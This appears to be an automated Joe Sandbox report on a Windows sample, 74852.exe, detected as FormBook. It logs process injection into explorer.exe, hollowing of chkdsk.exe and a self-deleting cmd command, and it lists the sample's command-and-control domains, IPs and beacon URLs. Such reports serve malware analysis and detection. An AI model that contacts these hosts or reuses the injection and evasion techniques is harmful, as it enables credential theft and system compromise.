Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]	1_2_01444BAD
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]	1_2_01444BAD
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E5BA5 mov eax, dword ptr fs:[00000030h]	1_2_014E5BA5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]	1_2_01419240
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]	1_2_01419240
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]	1_2_01419240
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]	1_2_01419240
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]	1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]	1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]	1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]	1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]	1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]	1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DAE44 mov eax, dword ptr fs:[00000030h]	1_2_014DAE44
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DAE44 mov eax, dword ptr fs:[00000030h]	1_2_014DAE44
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DEA55 mov eax, dword ptr fs:[00000030h]	1_2_014DEA55
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014A4257 mov eax, dword ptr fs:[00000030h]	1_2_014A4257
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014CB260 mov eax, dword ptr fs:[00000030h]	1_2_014CB260
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014CB260 mov eax, dword ptr fs:[00000030h]	1_2_014CB260
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E8A62 mov eax, dword ptr fs:[00000030h]	1_2_014E8A62
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142766D mov eax, dword ptr fs:[00000030h]	1_2_0142766D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]	1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]	1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]	1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]	1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]	1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0145927A mov eax, dword ptr fs:[00000030h]	1_2_0145927A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]	1_2_0141C600
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]	1_2_0141C600
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]	1_2_0141C600
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01448E00 mov eax, dword ptr fs:[00000030h]	1_2_01448E00
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1608 mov eax, dword ptr fs:[00000030h]	1_2_014D1608
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01428A0A mov eax, dword ptr fs:[00000030h]	1_2_01428A0A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]	1_2_01415210
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01415210 mov ecx, dword ptr fs:[00000030h]	1_2_01415210
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]	1_2_01415210
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]	1_2_01415210
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141AA16 mov eax, dword ptr fs:[00000030h]	1_2_0141AA16
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141AA16 mov eax, dword ptr fs:[00000030h]	1_2_0141AA16
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144A61C mov eax, dword ptr fs:[00000030h]	1_2_0144A61C
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144A61C mov eax, dword ptr fs:[00000030h]	1_2_0144A61C
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01433A1C mov eax, dword ptr fs:[00000030h]	1_2_01433A1C
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141E620 mov eax, dword ptr fs:[00000030h]	1_2_0141E620
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01454A2C mov eax, dword ptr fs:[00000030h]	1_2_01454A2C
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01454A2C mov eax, dword ptr fs:[00000030h]	1_2_01454A2C
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014CFE3F mov eax, dword ptr fs:[00000030h]	1_2_014CFE3F
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01458EC7 mov eax, dword ptr fs:[00000030h]	1_2_01458EC7
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014436CC mov eax, dword ptr fs:[00000030h]	1_2_014436CC
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014CFEC0 mov eax, dword ptr fs:[00000030h]	1_2_014CFEC0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442ACB mov eax, dword ptr fs:[00000030h]	1_2_01442ACB
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E8ED6 mov eax, dword ptr fs:[00000030h]	1_2_014E8ED6
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014276E2 mov eax, dword ptr fs:[00000030h]	1_2_014276E2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442AE4 mov eax, dword ptr fs:[00000030h]	1_2_01442AE4
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014416E0 mov ecx, dword ptr fs:[00000030h]	1_2_014416E0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AFE87 mov eax, dword ptr fs:[00000030h]	1_2_014AFE87
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144D294 mov eax, dword ptr fs:[00000030h]	1_2_0144D294
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144D294 mov eax, dword ptr fs:[00000030h]	1_2_0144D294
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]	1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]	1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]	1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]	1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]	1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E0EA5 mov eax, dword ptr fs:[00000030h]	1_2_014E0EA5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E0EA5 mov eax, dword ptr fs:[00000030h]	1_2_014E0EA5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E0EA5 mov eax, dword ptr fs:[00000030h]	1_2_014E0EA5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014946A7 mov eax, dword ptr fs:[00000030h]	1_2_014946A7
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0142AAB0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0142AAB0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0144FAB0

Source: C:\Users\user\Desktop\74852.exe

Code function: 0_2_00237910 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,

0_2_00237910

Source: C:\Users\user\Desktop\74852.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 185.78.22.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\74852.exe	Section loaded: unknown target: C:\Users\user\Desktop\74852.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\74852.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\74852.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\74852.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\74852.exe	Thread register set: target process: 3292			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3292			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\74852.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\74852.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1250000

Jump to behavior

Source: C:\Users\user\Desktop\74852.exe	Process created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.247067838.0000000001400000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000002.00000000.247067838.0000000001400000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.247067838.0000000001400000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.246830298.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000002.00000000.247067838.0000000001400000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Virtualization/Sandbox Evasion2	Input Capture1	Security Software Discovery131	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection512	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Information Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
74852.exe	43%	ReversingLabs	Win32.Trojan.Jaik
74852.exe	100%	Avira	TR/ATRAPS.Gen
74852.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.74852.exe.1790000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.74852.exe.230000.0.unpack	100%	Avira	HEUR/AGEN.1123427	Download File
0.2.74852.exe.2fa0000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.2.74852.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.2.74852.exe.230000.0.unpack	100%	Avira	HEUR/AGEN.1123427	Download File
0.2.74852.exe.230000.0.unpack	100%	Avira	HEUR/AGEN.1123427	Download File
1.0.74852.exe.230000.0.unpack	100%	Avira	HEUR/AGEN.1123427	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.pciappky.com/nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.wingateofhouston.com/nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.borokish.com	185.78.22.74	true	true	unknown
www.ifeelthevoice.com	74.208.236.11	true	false	unknown
www.pciappky.com	199.59.242.153	true	true	unknown
master-7rqtwti-vginpjx36tvho.uk-1.platformsh.site	35.242.183.249	true	true	unknown
wingateofhouston.com	34.102.136.180	true	true	unknown
www.wingateofhouston.com	unknown	unknown	true	unknown
www.baidu4.net	unknown	unknown	true	unknown
www.eternylyze.com	unknown	unknown	true	unknown
www.fishbitedogtreats.com	unknown	unknown	true	unknown
www.memorialinsg.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.pciappky.com/nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA	true	Avira URL Cloud: safe	unknown
http://www.wingateofhouston.com/nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.260457732.0000000006840000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
199.59.242.153	unknown	United States	395082	BODIS-NJUS	true
185.78.22.74	unknown	Iran (ISLAMIC Republic Of)	48434	TEBYANIR	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339342
Start date:	13.01.2021
Start time:	21:19:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	74852.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/0@10/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 46% (good quality ratio 43.4%) Quality average: 76.4% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 34 Number of non-executed functions: 101
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.42.151.234, 104.85.0.56, 51.104.139.180, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.142.210, 51.103.5.159, 52.155.217.156, 20.54.26.129, 51.11.168.160 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net VT rate limit hit for: /opt/package/joesandbox/database/analysis/339342/sample/74852.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
199.59.242.153	in.exe	Get hash	malicious	Browse	www.demenageseul.com/uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI
	zHgm9k7WYU.exe	Get hash	malicious	Browse	www.bigdudedesign.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0
	65BV6gbGFl.exe	Get hash	malicious	Browse	www.fallguysmovile.com/kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upv
	PO85937758859777.xlsx	Get hash	malicious	Browse	www.alwayadopt.com/8rg4/?RJ=WsO1qiz2dXOYooBDjHaDnsysS09xwMceuB64tfjAiEOaRoVYdCuvrl6g5TO0aeWlvtBBiA==&LFQHH=_pgx3Rd
